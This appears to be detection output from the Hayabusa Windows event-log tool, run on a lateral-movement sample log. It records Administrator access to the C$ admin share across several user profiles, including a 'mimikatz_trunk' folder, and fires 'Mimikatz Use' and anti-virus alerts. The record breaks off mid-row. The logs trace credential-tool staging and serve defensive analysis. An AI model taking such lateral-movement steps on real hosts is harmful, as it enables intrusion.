10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP 